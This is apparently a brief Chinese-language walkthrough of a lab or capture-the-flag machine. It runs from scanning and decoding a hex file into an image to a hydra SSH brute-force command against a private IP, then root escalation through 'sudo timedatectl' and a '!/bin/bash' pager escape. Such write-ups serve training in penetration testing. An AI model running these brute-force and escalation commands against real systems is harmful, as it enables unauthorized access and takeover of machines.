扫描IP
端口扫描
目录扫描,没啥发现
访问80端口,可以看到有一些文件
readme.md 中是十六进制的值
将内容写入readme.md中,使用 xxd 转换,查看文件,发现文件头为 JFIF ,是一张图片
将后缀修改为 jpg ,查看图片
mv readme.bin readme.jpg
一段留言,把上面的一些可能作为账号密码的字符拿下来,写个简单的字典,尝试爆破 ssh
Bob
BROKEN
avrahamcohen.ac
broken
getshell
使用 hydra 进行爆破
hydra -L 1.txt -P 111.txt ssh://192.168.111.151
得到账号密码:
broken:broken
ssh连接,连接成功
ssh broken@192.168.111.151
提权
查看当前权限
sudo -l
看到 timedatectl 可以执行root权限,执行命令,提权成功
sudo timedatectl list-timezones
!/bin/bash